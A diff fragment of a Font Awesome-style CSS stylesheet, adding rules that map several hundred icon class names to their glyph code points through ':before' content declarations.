+.fa-fast-backward:before { + content: '\f049'; +} +.fa-backward:before { + content: '\f04a'; +} +.fa-play:before { + content: '\f04b'; +} +.fa-pause:before { + content: '\f04c'; +} +.fa-stop:before { + content: '\f04d'; +} +.fa-forward:before { + content: '\f04e'; +} +.fa-fast-forward:before { + content: '\f050'; +} +.fa-step-forward:before { + content: '\f051'; +} +.fa-eject:before { + content: '\f052'; +} +.fa-chevron-left:before { + content: '\f053'; +} +.fa-chevron-right:before { + content: '\f054'; +} +.fa-plus-circle:before { + content: '\f055'; +} +.fa-minus-circle:before { + content: '\f056'; +} +.fa-times-circle:before { + content: '\f057'; +} +.fa-check-circle:before { + content: '\f058'; +} +.fa-question-circle:before { + content: '\f059'; +} +.fa-info-circle:before { + content: '\f05a'; +} +.fa-crosshairs:before { + content: '\f05b'; +} +.fa-times-circle-o:before { + content: '\f05c'; +} +.fa-check-circle-o:before { + content: '\f05d'; +} +.fa-ban:before { + content: '\f05e'; +} +.fa-arrow-left:before { + content: '\f060'; +} +.fa-arrow-right:before { + content: '\f061'; +} +.fa-arrow-up:before { + content: '\f062'; +} +.fa-arrow-down:before { + content: '\f063'; +} +.fa-mail-forward:before, +.fa-share:before { + content: '\f064'; +} +.fa-expand:before { + content: '\f065'; +} +.fa-compress:before { + content: '\f066'; +} +.fa-plus:before { + content: '\f067'; +} +.fa-minus:before { + content: '\f068'; +} +.fa-asterisk:before { + content: '\f069'; +} +.fa-exclamation-circle:before { + content: '\f06a'; +} +.fa-gift:before { + content: '\f06b'; +} +.fa-leaf:before { + content: '\f06c'; +} +.fa-fire:before { + content: '\f06d'; +} +.fa-eye:before { + content: '\f06e'; +} +.fa-eye-slash:before { + content: '\f070'; +} +.fa-warning:before, +.fa-exclamation-triangle:before { + content: '\f071'; +} +.fa-plane:before { + content: '\f072'; +} +.fa-calendar:before { + content: '\f073'; +} +.fa-random:before { + content: '\f074'; +} +.fa-comment:before { + content: '\f075'; +} +.fa-magnet:before { + content: '\f076'; +} +.fa-chevron-up:before { + content: '\f077'; +} +.fa-chevron-down:before { + content: '\f078'; +} +.fa-retweet:before { + content: '\f079'; +} +.fa-shopping-cart:before { + content: '\f07a'; +} +.fa-folder:before { + content: '\f07b'; +} +.fa-folder-open:before { + content: '\f07c'; +} +.fa-arrows-v:before { + content: '\f07d'; +} +.fa-arrows-h:before { + content: '\f07e'; +} +.fa-bar-chart-o:before, +.fa-bar-chart:before { + content: '\f080'; +} +.fa-twitter-square:before { + content: '\f081'; +} +.fa-facebook-square:before { + content: '\f082'; +} +.fa-camera-retro:before { + content: '\f083'; +} +.fa-key:before { + content: '\f084'; +} +.fa-gears:before, +.fa-cogs:before { + content: '\f085'; +} +.fa-comments:before { + content: '\f086'; +} +.fa-thumbs-o-up:before { + content: '\f087'; +} +.fa-thumbs-o-down:before { + content: '\f088'; +} +.fa-star-half:before { + content: '\f089'; +} +.fa-heart-o:before { + content: '\f08a'; +} +.fa-sign-out:before { + content: '\f08b'; +} +.fa-linkedin-square:before { + content: '\f08c'; +} +.fa-thumb-tack:before { + content: '\f08d'; +} +.fa-external-link:before { + content: '\f08e'; +} +.fa-sign-in:before { + content: '\f090'; +} +.fa-trophy:before { + content: '\f091'; +} +.fa-github-square:before { + content: '\f092'; +} +.fa-upload:before { + content: '\f093'; +} +.fa-lemon-o:before { + content: '\f094'; +} +.fa-phone:before { + content: '\f095'; +} +.fa-square-o:before { + content: '\f096'; +} +.fa-bookmark-o:before { + 
content: '\f097'; +} +.fa-phone-square:before { + content: '\f098'; +} +.fa-twitter:before { + content: '\f099'; +} +.fa-facebook-f:before, +.fa-facebook:before { + content: '\f09a'; +} +.fa-github:before { + content: '\f09b'; +} +.fa-unlock:before { + content: '\f09c'; +} +.fa-credit-card:before { + content: '\f09d'; +} +.fa-feed:before, +.fa-rss:before { + content: '\f09e'; +} +.fa-hdd-o:before { + content: '\f0a0'; +} +.fa-bullhorn:before { + content: '\f0a1'; +} +.fa-bell:before { + content: '\f0f3'; +} +.fa-certificate:before { + content: '\f0a3'; +} +.fa-hand-o-right:before { + content: '\f0a4'; +} +.fa-hand-o-left:before { + content: '\f0a5'; +} +.fa-hand-o-up:before { + content: '\f0a6'; +} +.fa-hand-o-down:before { + content: '\f0a7'; +} +.fa-arrow-circle-left:before { + content: '\f0a8'; +} +.fa-arrow-circle-right:before { + content: '\f0a9'; +} +.fa-arrow-circle-up:before { + content: '\f0aa'; +} +.fa-arrow-circle-down:before { + content: '\f0ab'; +} +.fa-globe:before { + content: '\f0ac'; +} +.fa-wrench:before { + content: '\f0ad'; +} +.fa-tasks:before { + content: '\f0ae'; +} +.fa-filter:before { + content: '\f0b0'; +} +.fa-briefcase:before { + content: '\f0b1'; +} +.fa-arrows-alt:before { + content: '\f0b2'; +} +.fa-group:before, +.fa-users:before { + content: '\f0c0'; +} +.fa-chain:before, +.fa-link:before { + content: '\f0c1'; +} +.fa-cloud:before { + content: '\f0c2'; +} +.fa-flask:before { + content: '\f0c3'; +} +.fa-cut:before, +.fa-scissors:before { + content: '\f0c4'; +} +.fa-copy:before, +.fa-files-o:before { + content: '\f0c5'; +} +.fa-paperclip:before { + content: '\f0c6'; +} +.fa-save:before, +.fa-floppy-o:before { + content: '\f0c7'; +} +.fa-square:before { + content: '\f0c8'; +} +.fa-navicon:before, +.fa-reorder:before, +.fa-bars:before { + content: '\f0c9'; +} +.fa-list-ul:before { + content: '\f0ca'; +} +.fa-list-ol:before { + content: '\f0cb'; +} +.fa-strikethrough:before { + content: '\f0cc'; +} +.fa-underline:before { + content: '\f0cd'; +} +.fa-table:before { + content: '\f0ce'; +} +.fa-magic:before { + content: '\f0d0'; +} +.fa-truck:before { + content: '\f0d1'; +} +.fa-pinterest:before { + content: '\f0d2'; +} +.fa-pinterest-square:before { + content: '\f0d3'; +} +.fa-google-plus-square:before { + content: '\f0d4'; +} +.fa-google-plus:before { + content: '\f0d5'; +} +.fa-money:before { + content: '\f0d6'; +} +.fa-caret-down:before { + content: '\f0d7'; +} +.fa-caret-up:before { + content: '\f0d8'; +} +.fa-caret-left:before { + content: '\f0d9'; +} +.fa-caret-right:before { + content: '\f0da'; +} +.fa-columns:before { + content: '\f0db'; +} +.fa-unsorted:before, +.fa-sort:before { + content: '\f0dc'; +} +.fa-sort-down:before, +.fa-sort-desc:before { + content: '\f0dd'; +} +.fa-sort-up:before, +.fa-sort-asc:before { + content: '\f0de'; +} +.fa-envelope:before { + content: '\f0e0'; +} +.fa-linkedin:before { + content: '\f0e1'; +} +.fa-rotate-left:before, +.fa-undo:before { + content: '\f0e2'; +} +.fa-legal:before, +.fa-gavel:before { + content: '\f0e3'; +} +.fa-dashboard:before, +.fa-tachometer:before { + content: '\f0e4'; +} +.fa-comment-o:before { + content: '\f0e5'; +} +.fa-comments-o:before { + content: '\f0e6'; +} +.fa-flash:before, +.fa-bolt:before { + content: '\f0e7'; +} +.fa-sitemap:before { + content: '\f0e8'; +} +.fa-umbrella:before { + content: '\f0e9'; +} +.fa-paste:before, +.fa-clipboard:before { + content: '\f0ea'; +} +.fa-lightbulb-o:before { + content: '\f0eb'; +} +.fa-exchange:before { + content: '\f0ec'; +} +.fa-cloud-download:before { + 
content: '\f0ed'; +} +.fa-cloud-upload:before { + content: '\f0ee'; +} +.fa-user-md:before { + content: '\f0f0'; +} +.fa-stethoscope:before { + content: '\f0f1'; +} +.fa-suitcase:before { + content: '\f0f2'; +} +.fa-bell-o:before { + content: '\f0a2'; +} +.fa-coffee:before { + content: '\f0f4'; +} +.fa-cutlery:before { + content: '\f0f5'; +} +.fa-file-text-o:before { + content: '\f0f6'; +} +.fa-building-o:before { + content: '\f0f7'; +} +.fa-hospital-o:before { + content: '\f0f8'; +} +.fa-ambulance:before { + content: '\f0f9'; +} +.fa-medkit:before { + content: '\f0fa'; +} +.fa-fighter-jet:before { + content: '\f0fb'; +} +.fa-beer:before { + content: '\f0fc'; +} +.fa-h-square:before { + content: '\f0fd'; +} +.fa-plus-square:before { + content: '\f0fe'; +} +.fa-angle-double-left:before { + content: '\f100'; +} +.fa-angle-double-right:before { + content: '\f101'; +} +.fa-angle-double-up:before { + content: '\f102'; +} +.fa-angle-double-down:before { + content: '\f103'; +} +.fa-angle-left:before { + content: '\f104'; +} +.fa-angle-right:before { + content: '\f105'; +} +.fa-angle-up:before { + content: '\f106'; +} +.fa-angle-down:before { + content: '\f107'; +} +.fa-desktop:before { + content: '\f108'; +} +.fa-laptop:before { + content: '\f109'; +} +.fa-tablet:before { + content: '\f10a'; +} +.fa-mobile-phone:before, +.fa-mobile:before { + content: '\f10b'; +} +.fa-circle-o:before { + content: '\f10c'; +} +.fa-quote-left:before { + content: '\f10d'; +} +.fa-quote-right:before { + content: '\f10e'; +} +.fa-spinner:before { + content: '\f110'; +} +.fa-circle:before { + content: '\f111'; +} +.fa-mail-reply:before, +.fa-reply:before { + content: '\f112'; +} +.fa-github-alt:before { + content: '\f113'; +} +.fa-folder-o:before { + content: '\f114'; +} +.fa-folder-open-o:before { + content: '\f115'; +} +.fa-smile-o:before { + content: '\f118'; +} +.fa-frown-o:before { + content: '\f119'; +} +.fa-meh-o:before { + content: '\f11a'; +} +.fa-gamepad:before { + content: '\f11b'; +} +.fa-keyboard-o:before { + content: '\f11c'; +} +.fa-flag-o:before { + content: '\f11d'; +} +.fa-flag-checkered:before { + content: '\f11e'; +} +.fa-terminal:before { + content: '\f120'; +} +.fa-code:before { + content: '\f121'; +} +.fa-mail-reply-all:before, +.fa-reply-all:before { + content: '\f122'; +} +.fa-star-half-empty:before, +.fa-star-half-full:before, +.fa-star-half-o:before { + content: '\f123'; +} +.fa-location-arrow:before { + content: '\f124'; +} +.fa-crop:before { + content: '\f125'; +} +.fa-code-fork:before { + content: '\f126'; +} +.fa-unlink:before, +.fa-chain-broken:before { + content: '\f127'; +} +.fa-question:before { + content: '\f128'; +} +.fa-info:before { + content: '\f129'; +} +.fa-exclamation:before { + content: '\f12a'; +} +.fa-superscript:before { + content: '\f12b'; +} +.fa-subscript:before { + content: '\f12c'; +} +.fa-eraser:before { + content: '\f12d'; +} +.fa-puzzle-piece:before { + content: '\f12e'; +} +.fa-microphone:before { + content: '\f130'; +} +.fa-microphone-slash:before { + content: '\f131'; +} +.fa-shield:before { + content: '\f132'; +} +.fa-calendar-o:before { + content: '\f133'; +} +.fa-fire-extinguisher:before { + content: '\f134'; +} +.fa-rocket:before { + content: '\f135'; +} +.fa-maxcdn:before { + content: '\f136'; +} +.fa-chevron-circle-left:before { + content: '\f137'; +} +.fa-chevron-circle-right:before { + content: '\f138'; +} +.fa-chevron-circle-up:before { + content: '\f139'; +} +.fa-chevron-circle-down:before { + content: '\f13a'; +} +.fa-html5:before { + content: 
'\f13b'; +} +.fa-css3:before { + content: '\f13c'; +} +.fa-anchor:before { + content: '\f13d'; +} +.fa-unlock-alt:before { + content: '\f13e'; +} +.fa-bullseye:before { + content: '\f140'; +} +.fa-ellipsis-h:before { + content: '\f141'; +} +.fa-ellipsis-v:before { + content: '\f142'; +} +.fa-rss-square:before { + content: '\f143'; +} +.fa-play-circle:before { + content: '\f144'; +} +.fa-ticket:before { + content: '\f145'; +} +.fa-minus-square:before { + content: '\f146'; +} +.fa-minus-square-o:before { + content: '\f147'; +} +.fa-level-up:before { + content: '\f148'; +} +.fa-level-down:before { + content: '\f149'; +} +.fa-check-square:before { + content: '\f14a'; +} +.fa-pencil-square:before { + content: '\f14b'; +} +.fa-external-link-square:before { + content: '\f14c'; +} +.fa-share-square:before { + content: '\f14d'; +} +.fa-compass:before { + content: '\f14e'; +} +.fa-toggle-down:before, +.fa-caret-square-o-down:before { + content: '\f150'; +} +.fa-toggle-up:before, +.fa-caret-square-o-up:before { + content: '\f151'; +} +.fa-toggle-right:before, +.fa-caret-square-o-right:before { + content: '\f152'; +} +.fa-euro:before, +.fa-eur:before { + content: '\f153'; +} +.fa-gbp:before { + content: '\f154'; +} +.fa-dollar:before, +.fa-usd:before { + content: '\f155'; +} +.fa-rupee:before, +.fa-inr:before { + content: '\f156'; +} +.fa-cny:before, +.fa-rmb:before, +.fa-yen:before, +.fa-jpy:before { + content: '\f157'; +} +.fa-ruble:before, +.fa-rouble:before, +.fa-rub:before { + content: '\f158'; +} +.fa-won:before, +.fa-krw:before { + content: '\f159'; +} +.fa-bitcoin:before, +.fa-btc:before { + content: '\f15a'; +} +.fa-file:before { + content: '\f15b'; +} +.fa-file-text:before { + content: '\f15c'; +} +.fa-sort-alpha-asc:before { + content: '\f15d'; +} +.fa-sort-alpha-desc:before { + content: '\f15e'; +} +.fa-sort-amount-asc:before { + content: '\f160'; +} +.fa-sort-amount-desc:before { + content: '\f161'; +} +.fa-sort-numeric-asc:before { + content: '\f162'; +} +.fa-sort-numeric-desc:before { + content: '\f163'; +} +.fa-thumbs-up:before { + content: '\f164'; +} +.fa-thumbs-down:before { + content: '\f165'; +} +.fa-youtube-square:before { + content: '\f166'; +} +.fa-youtube:before { + content: '\f167'; +} +.fa-xing:before { + content: '\f168'; +} +.fa-xing-square:before { + content: '\f169'; +} +.fa-youtube-play:before { + content: '\f16a'; +} +.fa-dropbox:before { + content: '\f16b'; +} +.fa-stack-overflow:before { + content: '\f16c'; +} +.fa-instagram:before { + content: '\f16d'; +} +.fa-flickr:before { + content: '\f16e'; +} +.fa-adn:before { + content: '\f170'; +} +.fa-bitbucket:before { + content: '\f171'; +} +.fa-bitbucket-square:before { + content: '\f172'; +} +.fa-tumblr:before { + content: '\f173'; +} +.fa-tumblr-square:before { + content: '\f174'; +} +.fa-long-arrow-down:before { + content: '\f175'; +} +.fa-long-arrow-up:before { + content: '\f176'; +} +.fa-long-arrow-left:before { + content: '\f177'; +} +.fa-long-arrow-right:before { + content: '\f178'; +} +.fa-apple:before { + content: '\f179'; +} +.fa-windows:before { + content: '\f17a'; +} +.fa-android:before { + content: '\f17b'; +} +.fa-linux:before { + content: '\f17c'; +} +.fa-dribbble:before { + content: '\f17d'; +} +.fa-skype:before { + content: '\f17e'; +} +.fa-foursquare:before { + content: '\f180'; +} +.fa-trello:before { + content: '\f181'; +} +.fa-female:before { + content: '\f182'; +} +.fa-male:before { + content: '\f183'; +} +.fa-gittip:before, +.fa-gratipay:before { + content: '\f184'; +} +.fa-sun-o:before { + 
content: '\f185'; +} +.fa-moon-o:before { + content: '\f186'; +} +.fa-archive:before { + content: '\f187'; +} +.fa-bug:before { + content: '\f188'; +} +.fa-vk:before { + content: '\f189'; +} +.fa-weibo:before { + content: '\f18a'; +} +.fa-renren:before { + content: '\f18b'; +} +.fa-pagelines:before { + content: '\f18c'; +} +.fa-stack-exchange:before { + content: '\f18d'; +} +.fa-arrow-circle-o-right:before { + content: '\f18e'; +} +.fa-arrow-circle-o-left:before { + content: '\f190'; +} +.fa-toggle-left:before, +.fa-caret-square-o-left:before { + content: '\f191'; +} +.fa-dot-circle-o:before { + content: '\f192'; +} +.fa-wheelchair:before { + content: '\f193'; +} +.fa-vimeo-square:before { + content: '\f194'; +} +.fa-turkish-lira:before, +.fa-try:before { + content: '\f195'; +} +.fa-plus-square-o:before { + content: '\f196'; +} +.fa-space-shuttle:before { + content: '\f197'; +} +.fa-slack:before { + content: '\f198'; +} +.fa-envelope-square:before { + content: '\f199'; +} +.fa-wordpress:before { + content: '\f19a'; +} +.fa-openid:before { + content: '\f19b'; +} +.fa-institution:before, +.fa-bank:before, +.fa-university:before { + content: '\f19c'; +} +.fa-mortar-board:before, +.fa-graduation-cap:before { + content: '\f19d'; +} +.fa-yahoo:before { + content: '\f19e'; +} +.fa-google:before { + content: '\f1a0'; +} +.fa-reddit:before { + content: '\f1a1'; +} +.fa-reddit-square:before { + content: '\f1a2'; +} +.fa-stumbleupon-circle:before { + content: '\f1a3'; +} +.fa-stumbleupon:before { + content: '\f1a4'; +} +.fa-delicious:before { + content: '\f1a5'; +} +.fa-digg:before { + content: '\f1a6'; +} +.fa-pied-piper-pp:before { + content: '\f1a7'; +} +.fa-pied-piper-alt:before { + content: '\f1a8'; +} +.fa-drupal:before { + content: '\f1a9'; +} +.fa-joomla:before { + content: '\f1aa'; +} +.fa-language:before { + content: '\f1ab'; +} +.fa-fax:before { + content: '\f1ac'; +} +.fa-building:before { + content: '\f1ad'; +} +.fa-child:before { + content: '\f1ae'; +} +.fa-paw:before { + content: '\f1b0'; +} +.fa-spoon:before { + content: '\f1b1'; +} +.fa-cube:before { + content: '\f1b2'; +} +.fa-cubes:before { + content: '\f1b3'; +} +.fa-behance:before { + content: '\f1b4'; +} +.fa-behance-square:before { + content: '\f1b5'; +} +.fa-steam:before { + content: '\f1b6'; +} +.fa-steam-square:before { + content: '\f1b7'; +} +.fa-recycle:before { + content: '\f1b8'; +} +.fa-automobile:before, +.fa-car:before { + content: '\f1b9'; +} +.fa-cab:before, +.fa-taxi:before { + content: '\f1ba'; +} +.fa-tree:before { + content: '\f1bb'; +} +.fa-spotify:before { + content: '\f1bc'; +} +.fa-deviantart:before { + content: '\f1bd'; +} +.fa-soundcloud:before { + content: '\f1be'; +} +.fa-database:before { + content: '\f1c0'; +} +.fa-file-pdf-o:before { + content: '\f1c1'; +} +.fa-file-word-o:before { + content: '\f1c2'; +} +.fa-file-excel-o:before { + content: '\f1c3'; +} +.fa-file-powerpoint-o:before { + content: '\f1c4'; +} +.fa-file-photo-o:before, +.fa-file-picture-o:before, +.fa-file-image-o:before { + content: '\f1c5'; +} +.fa-file-zip-o:before, +.fa-file-archive-o:before { + content: '\f1c6'; +} +.fa-file-sound-o:before, +.fa-file-audio-o:before { + content: '\f1c7'; +} +.fa-file-movie-o:before, +.fa-file-video-o:before { + content: '\f1c8'; +} +.fa-file-code-o:before { + content: '\f1c9'; +} +.fa-vine:before { + content: '\f1ca'; +} +.fa-codepen:before { + content: '\f1cb'; +} +.fa-jsfiddle:before { + content: '\f1cc'; +} +.fa-life-bouy:before, +.fa-life-buoy:before, +.fa-life-saver:before, +.fa-support:before, 
+.fa-life-ring:before { + content: '\f1cd'; +} +.fa-circle-o-notch:before { + content: '\f1ce'; +} +.fa-ra:before, +.fa-resistance:before, +.fa-rebel:before { + content: '\f1d0'; +} +.fa-ge:before, +.fa-empire:before { + content: '\f1d1'; +} +.fa-git-square:before { + content: '\f1d2'; +} +.fa-git:before { + content: '\f1d3'; +} +.fa-y-combinator-square:before, +.fa-yc-square:before, +.fa-hacker-news:before { + content: '\f1d4'; +} +.fa-tencent-weibo:before { + content: '\f1d5'; +} +.fa-qq:before { + content: '\f1d6'; +} +.fa-wechat:before, +.fa-weixin:before { + content: '\f1d7'; +} +.fa-send:before, +.fa-paper-plane:before { + content: '\f1d8'; +} +.fa-send-o:before, +.fa-paper-plane-o:before { + content: '\f1d9'; +} +.fa-history:before { + content: '\f1da'; +} +.fa-circle-thin:before { + content: '\f1db'; +} +.fa-header:before { + content: '\f1dc'; +} +.fa-paragraph:before { + content: '\f1dd'; +} +.fa-sliders:before { + content: '\f1de'; +} +.fa-share-alt:before { + content: '\f1e0'; +} +.fa-share-alt-square:before { + content: '\f1e1'; +} +.fa-bomb:before { + content: '\f1e2'; +} +.fa-soccer-ball-o:before, +.fa-futbol-o:before { + content: '\f1e3'; +} +.fa-tty:before { + content: '\f1e4'; +} +.fa-binoculars:before { + content: '\f1e5'; +} +.fa-plug:before { + content: '\f1e6'; +} +.fa-slideshare:before { + content: '\f1e7'; +} +.fa-twitch:before { + content: '\f1e8'; +} +.fa-yelp:before { + content: '\f1e9'; +} +.fa-newspaper-o:before { + content: '\f1ea'; +} +.fa-wifi:before { + content: '\f1eb'; +} +.fa-calculator:before { + content: '\f1ec'; +} +.fa-paypal:before { + content: '\f1ed'; +} +.fa-google-wallet:before { + content: '\f1ee'; +} +.fa-cc-visa:before { + content: '\f1f0'; +} +.fa-cc-mastercard:before { + content: '\f1f1'; +} +.fa-cc-discover:before { + content: '\f1f2'; +} +.fa-cc-amex:before { + content: '\f1f3'; +} +.fa-cc-paypal:before { + content: '\f1f4'; +} +.fa-cc-stripe:before { + content: '\f1f5'; +} +.fa-bell-slash:before { + content: '\f1f6'; +} +.fa-bell-slash-o:before { + content: '\f1f7'; +} +.fa-trash:before { + content: '\f1f8'; +} +.fa-copyright:before { + content: '\f1f9'; +} +.fa-at:before { + content: '\f1fa'; +} +.fa-eyedropper:before { + content: '\f1fb'; +} +.fa-paint-brush:before { + content: '\f1fc'; +} +.fa-birthday-cake:before { + content: '\f1fd'; +} +.fa-area-chart:before { + content: '\f1fe'; +} +.fa-pie-chart:before { + content: '\f200'; +} +.fa-line-chart:before { + content: '\f201'; +} +.fa-lastfm:before { + content: '\f202'; +} +.fa-lastfm-square:before { + content: '\f203'; +} +.fa-toggle-off:before { + content: '\f204'; +} +.fa-toggle-on:before { + content: '\f205'; +} +.fa-bicycle:before { + content: '\f206'; +} +.fa-bus:before { + content: '\f207'; +} +.fa-ioxhost:before { + content: '\f208'; +} +.fa-angellist:before { + content: '\f209'; +} +.fa-cc:before { + content: '\f20a'; +} +.fa-shekel:before, +.fa-sheqel:before, +.fa-ils:before { + content: '\f20b'; +} +.fa-meanpath:before { + content: '\f20c'; +} +.fa-buysellads:before { + content: '\f20d'; +} +.fa-connectdevelop:before { + content: '\f20e'; +} +.fa-dashcube:before { + content: '\f210'; +} +.fa-forumbee:before { + content: '\f211'; +} +.fa-leanpub:before { + content: '\f212'; +} +.fa-sellsy:before { + content: '\f213'; +} +.fa-shirtsinbulk:before { + content: '\f214'; +} +.fa-simplybuilt:before { + content: '\f215'; +} +.fa-skyatlas:before { + content: '\f216'; +} +.fa-cart-plus:before { + content: '\f217'; +} +.fa-cart-arrow-down:before { + content: '\f218'; +} 
+.fa-diamond:before { + content: '\f219'; +} +.fa-ship:before { + content: '\f21a'; +} +.fa-user-secret:before { + content: '\f21b'; +} +.fa-motorcycle:before { + content: '\f21c'; +} +.fa-street-view:before { + content: '\f21d'; +} +.fa-heartbeat:before { + content: '\f21e'; +} +.fa-venus:before { + content: '\f221'; +} +.fa-mars:before { + content: '\f222'; +} +.fa-mercury:before { + content: '\f223'; +} +.fa-intersex:before, +.fa-transgender:before { + content: '\f224'; +} +.fa-transgender-alt:before { + content: '\f225'; +} +.fa-venus-double:before { + content: '\f226'; +} +.fa-mars-double:before { + content: '\f227'; +} +.fa-venus-mars:before { + content: '\f228'; +} +.fa-mars-stroke:before { + content: '\f229'; +} +.fa-mars-stroke-v:before { + content: '\f22a'; +} +.fa-mars-stroke-h:before { + content: '\f22b'; +} +.fa-neuter:before { + content: '\f22c'; +} +.fa-genderless:before { + content: '\f22d'; +} +.fa-facebook-official:before { + content: '\f230'; +} +.fa-pinterest-p:before { + content: '\f231'; +} +.fa-whatsapp:before { + content: '\f232'; +} +.fa-server:before { + content: '\f233'; +} +.fa-user-plus:before { + content: '\f234'; +} +.fa-user-times:before { + content: '\f235'; +} +.fa-hotel:before, +.fa-bed:before { + content: '\f236'; +} +.fa-viacoin:before { + content: '\f237'; +} +.fa-train:before { + content: '\f238'; +} +.fa-subway:before { + content: '\f239'; +} +.fa-medium:before { + content: '\f23a'; +} +.fa-yc:before, +.fa-y-combinator:before { + content: '\f23b'; +} +.fa-optin-monster:before { + content: '\f23c'; +} +.fa-opencart:before { + content: '\f23d'; +} +.fa-expeditedssl:before { + content: '\f23e'; +} +.fa-battery-4:before, +.fa-battery:before, +.fa-battery-full:before { + content: '\f240'; +} +.fa-battery-3:before, +.fa-battery-three-quarters:before { + content: '\f241'; +} +.fa-battery-2:before, +.fa-battery-half:before { + content: '\f242'; +} +.fa-battery-1:before, +.fa-battery-quarter:before { + content: '\f243'; +} +.fa-battery-0:before, +.fa-battery-empty:before { + content: '\f244'; +} +.fa-mouse-pointer:before { + content: '\f245'; +} +.fa-i-cursor:before { + content: '\f246'; +} +.fa-object-group:before { + content: '\f247'; +} +.fa-object-ungroup:before { + content: '\f248'; +} +.fa-sticky-note:before { + content: '\f249'; +} +.fa-sticky-note-o:before { + content: '\f24a'; +} +.fa-cc-jcb:before { + content: '\f24b'; +} +.fa-cc-diners-club:before { + content: '\f24c'; +} +.fa-clone:before { + content: '\f24d'; +} +.fa-balance-scale:before { + content: '\f24e'; +} +.fa-hourglass-o:before { + content: '\f250'; +} +.fa-hourglass-1:before, +.fa-hourglass-start:before { + content: '\f251'; +} +.fa-hourglass-2:before, +.fa-hourglass-half:before { + content: '\f252'; +} +.fa-hourglass-3:before, +.fa-hourglass-end:before { + content: '\f253'; +} +.fa-hourglass:before { + content: '\f254'; +} +.fa-hand-grab-o:before, +.fa-hand-rock-o:before { + content: '\f255'; +} +.fa-hand-stop-o:before, +.fa-hand-paper-o:before { + content: '\f256'; +} +.fa-hand-scissors-o:before { + content: '\f257'; +} +.fa-hand-lizard-o:before { + content: '\f258'; +} +.fa-hand-spock-o:before { + content: '\f259'; +} +.fa-hand-pointer-o:before { + content: '\f25a'; +} +.fa-hand-peace-o:before { + content: '\f25b'; +} +.fa-trademark:before { + content: '\f25c'; +} +.fa-registered:before { + content: '\f25d'; +} +.fa-creative-commons:before { + content: '\f25e'; +} +.fa-gg:before { + content: '\f260'; +} +.fa-gg-circle:before { + content: '\f261'; +} +.fa-tripadvisor:before { + 
content: '\f262'; +} +.fa-odnoklassniki:before { + content: '\f263'; +} +.fa-odnoklassniki-square:before { + content: '\f264'; +} +.fa-get-pocket:before { + content: '\f265'; +} +.fa-wikipedia-w:before { + content: '\f266'; +} +.fa-safari:before { + content: '\f267'; +} +.fa-chrome:before { + content: '\f268'; +} +.fa-firefox:before { + content: '\f269'; +} +.fa-opera:before { + content: '\f26a'; +} +.fa-internet-explorer:before { + content: '\f26b'; +} +.fa-tv:before, +.fa-television:before { + content: '\f26c'; +} +.fa-contao:before { + content: '\f26d'; +} +.fa-500px:before { + content: '\f26e'; +} +.fa-amazon:before { + content: '\f270'; +} +.fa-calendar-plus-o:before { + content: '\f271'; +} +.fa-calendar-minus-o:before { + content: '\f272'; +} +.fa-calendar-times-o:before { + content: '\f273'; +} +.fa-calendar-check-o:before { + content: '\f274'; +} +.fa-industry:before { + content: '\f275'; +} +.fa-map-pin:before { + content: '\f276'; +} +.fa-map-signs:before { + content: '\f277'; +} +.fa-map-o:before { + content: '\f278'; +} +.fa-map:before { + content: '\f279'; +} +.fa-commenting:before { + content: '\f27a'; +} +.fa-commenting-o:before { + content: '\f27b'; +} +.fa-houzz:before { + content: '\f27c'; +} +.fa-vimeo:before { + content: '\f27d'; +} +.fa-black-tie:before { + content: '\f27e'; +} +.fa-fonticons:before { + content: '\f280'; +} +.fa-reddit-alien:before { + content: '\f281'; +} +.fa-edge:before { + content: '\f282'; +} +.fa-credit-card-alt:before { + content: '\f283'; +} +.fa-codiepie:before { + content: '\f284'; +} +.fa-modx:before { + content: '\f285'; +} +.fa-fort-awesome:before { + content: '\f286'; +} +.fa-usb:before { + content: '\f287'; +} +.fa-product-hunt:before { + content: '\f288'; +} +.fa-mixcloud:before { + content: '\f289'; +} +.fa-scribd:before { + content: '\f28a'; +} +.fa-pause-circle:before { + content: '\f28b'; +} +.fa-pause-circle-o:before { + content: '\f28c'; +} +.fa-stop-circle:before { + content: '\f28d'; +} +.fa-stop-circle-o:before { + content: '\f28e'; +} +.fa-shopping-bag:before { + content: '\f290'; +} +.fa-shopping-basket:before { + content: '\f291'; +} +.fa-hashtag:before { + content: '\f292'; +} +.fa-bluetooth:before { + content: '\f293'; +} +.fa-bluetooth-b:before { + content: '\f294'; +} +.fa-percent:before { + content: '\f295'; +} +.fa-gitlab:before { + content: '\f296'; +} +.fa-wpbeginner:before { + content: '\f297'; +} +.fa-wpforms:before { + content: '\f298'; +} +.fa-envira:before { + content: '\f299'; +} +.fa-universal-access:before { + content: '\f29a'; +} +.fa-wheelchair-alt:before { + content: '\f29b'; +} +.fa-question-circle-o:before { + content: '\f29c'; +} +.fa-blind:before { + content: '\f29d'; +} +.fa-audio-description:before { + content: '\f29e'; +} +.fa-volume-control-phone:before { + content: '\f2a0'; +} +.fa-braille:before { + content: '\f2a1'; +} +.fa-assistive-listening-systems:before { + content: '\f2a2'; +} +.fa-asl-interpreting:before, +.fa-american-sign-language-interpreting:before { + content: '\f2a3'; +} +.fa-deafness:before, +.fa-hard-of-hearing:before, +.fa-deaf:before { + content: '\f2a4'; +} +.fa-glide:before { + content: '\f2a5'; +} +.fa-glide-g:before { + content: '\f2a6'; +} +.fa-signing:before, +.fa-sign-language:before { + content: '\f2a7'; +} +.fa-low-vision:before { + content: '\f2a8'; +} +.fa-viadeo:before { + content: '\f2a9'; +} +.fa-viadeo-square:before { + content: '\f2aa'; +} +.fa-snapchat:before { + content: '\f2ab'; +} +.fa-snapchat-ghost:before { + content: '\f2ac'; +} 
+.fa-snapchat-square:before { + content: '\f2ad'; +} +.fa-pied-piper:before { + content: '\f2ae'; +} +.fa-first-order:before { + content: '\f2b0'; +} +.fa-yoast:before { + content: '\f2b1'; +} +.fa-themeisle:before { + content: '\f2b2'; +} +.fa-google-plus-circle:before, +.fa-google-plus-official:before { + content: '\f2b3'; +} +.fa-fa:before, +.fa-font-awesome:before { + content: '\f2b4'; +} +.fa-handshake-o:before { + content: '\f2b5'; +} +.fa-envelope-open:before { + content: '\f2b6'; +} +.fa-envelope-open-o:before { + content: '\f2b7'; +} +.fa-linode:before { + content: '\f2b8'; +} +.fa-address-book:before { + content: '\f2b9'; +} +.fa-address-book-o:before { + content: '\f2ba'; +} +.fa-vcard:before, +.fa-address-card:before { + content: '\f2bb'; +} +.fa-vcard-o:before, +.fa-address-card-o:before { + content: '\f2bc'; +} +.fa-user-circle:before { + content: '\f2bd'; +} +.fa-user-circle-o:before { + content: '\f2be'; +} +.fa-user-o:before { + content: '\f2c0'; +} 